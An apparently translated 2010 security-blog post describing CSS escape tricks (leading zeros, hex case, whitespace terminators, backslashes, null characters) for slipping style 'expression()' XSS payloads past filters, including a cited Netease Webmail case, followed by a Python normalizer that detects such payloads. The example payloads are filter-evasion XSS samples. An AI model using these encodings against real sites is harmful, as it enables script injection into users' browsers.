Encoding and backslash are also basic methods to be mastered in XSS vulnerability mining. Here we provide three techniques for XSS vulnerability mining that use CSS encoding and backslash.
Author & Translator: www.pulog.org
2010/07/17
Tip 1: Change the number of leading zeros in the encoded value (\0X -> \00000X).
Example: <p style="xss:\65 xpression(alert(/wpulog/)">
<p style="xss:\065 xpression(alert(/wpulog/)">
<p style="xss:\0065 xpression(alert(/wpulog/)">
The results are the same.
Tip 2: Change the case of the hex digits in the encoded characters (\0A -> \0a).
Example: <p style="xss:expression(alert(/wpulog/)\x0d">
<p style="xss:expression(alert(/wpulog/)\x0D">
The results are the same.
Tip 3: Add a blank character after the encoded characters (IE accepts \x20 and \x09; Firefox and Opera accept \x0A and \x0D).
For example, in IE, <p style="xss:\65 xpression(alert(/wpulog/)"> still runs even with a space between \65 and x.
In addition, a backslash placed before a letter in CSS is ignored: \x is equivalent to x, whereas \n is not equal to n. In Firefox you can also put a backslash in front of a line break (\x0A, \x0D), for example <div style="xx:
\
Gg">
In IE, a null character (\0) can be inserted into a CSS attribute value. For example, the Netease Webmail XSS vulnerability:
<p style="xss:ex&#00;pression(alert(/wpulog/)">.
Different browsers support different encodings. For example, Firefox does not support encoding the parentheses, while IE does: <p style="xss:expression\28alert\28/wpulog/\29\29"> executes normally in IE.
These techniques can be combined with other encoding methods and may produce unexpected results in XSS vulnerability mining.
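The practical consequence of all three tips, from the defender's side, is that a filter which looks for the literal string `expression(` in a style attribute is bypassed by every variant above. A filter must first canonicalize the value the way the browser's CSS tokenizer does. The code below is an added example, not code from the original post or from heideri.ch: it implements the CSS escape rules the post describes (a backslash followed by one to six hex digits, an optional single terminating whitespace character, a backslash before any other character being dropped, backslash-newline being removed, a numeric character reference `&#00;` or a raw NUL being ignored), and then runs a keyword check over the normalized text. The helper names `normalize_css_value` and `contains_css_expression` are mine. One caveat the example makes visible: per the CSS specification an escape greedily consumes up to six hex digits, so `\28alert` parses as U+028A followed by `lert`; the tolerance the post reports for that form in IE is IE-specific and is not modelled here, which is exactly why a detector has to tokenize like the browser it protects.

```python
import re

# A CSS hex escape: backslash, 1-6 hex digits, then one optional whitespace
# terminator (CRLF counts as a single terminator).  Case-insensitive by
# construction, which is what makes \0A and \0a equivalent (Tip 2).
HEX_ESCAPE = re.compile(r'\\([0-9a-fA-F]{1,6})(\r\n|[ \t\r\n\f])?')

# HTML numeric character references (decoded before CSS parsing).
CHARREF = re.compile(r'&#(?:x([0-9a-fA-F]+)|([0-9]+));?')

# Keyword check run on the canonical form only.
CSS_EXPRESSION = re.compile(r'expression\s*\(', re.IGNORECASE)


def _decode_charrefs(value: str) -> str:
    """Decode &#NN; / &#xNN;.  The post reports IE treating &#00; as an
    ignorable NUL, so code point 0 is dropped here (assumption: we model the
    legacy behaviour; an HTML5 parser would yield U+FFFD instead)."""
    def repl(m: re.Match) -> str:
        cp = int(m.group(1), 16) if m.group(1) else int(m.group(2))
        if cp == 0:
            return ''
        return chr(cp) if cp <= 0x10FFFF else '\ufffd'
    return CHARREF.sub(repl, value)


def normalize_css_value(value: str) -> str:
    """Canonicalize a style-attribute value so that \65 xpression,
    \065 xpression, \0065 xpression, e\\xpression, ex&#00;pression and the
    plain word all collapse to 'expression'."""
    text = _decode_charrefs(value)
    # IE ignored raw NUL bytes inside the value.
    text = text.replace('\x00', '')
    out = []
    i, n = 0, len(text)
    while i < n:
        ch = text[i]
        if ch != '\\':
            out.append(ch)
            i += 1
            continue
        m = HEX_ESCAPE.match(text, i)
        if m:
            # Tip 1: any number of leading zeros decodes to the same char.
            # Tip 3: the terminating whitespace is swallowed by the escape.
            cp = int(m.group(1), 16)
            out.append(chr(cp) if 0 < cp <= 0x10FFFF else '\ufffd')
            i = m.end()
            continue
        # Backslash-newline (Firefox example in the post): dropped entirely.
        if text.startswith('\r\n', i + 1):
            i += 3
            continue
        if i + 1 < n and text[i + 1] in '\n\r\f':
            i += 2
            continue
        # Backslash before any other character: the backslash is ignored.
        if i + 1 < n:
            out.append(text[i + 1])
            i += 2
        else:
            i += 1
    return ''.join(out)


def contains_css_expression(value: str) -> bool:
    """True if the canonical form of the value invokes expression()."""
    return CSS_EXPRESSION.search(normalize_css_value(value)) is not None


if __name__ == '__main__':
    # Constructed sample values echoing the post's payload shapes.
    for v in (r'xss:\65 xpression(alert(1))', r'xss:\0065 xpression(alert(1))',
              'xss:ex&#00;pression(alert(1))', 'color: red'):
        print(repr(v), '->', repr(normalize_css_value(v)),
              'flagged' if contains_css_expression(v) else 'clean')
```

Running the block prints the canonical form of each constructed value next to the filter verdict; the important point is that the verdict is computed on the normalized string, never on the raw attribute.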
[+] Reference:
~~~~~~~~~
http://heideri.ch/jso/#61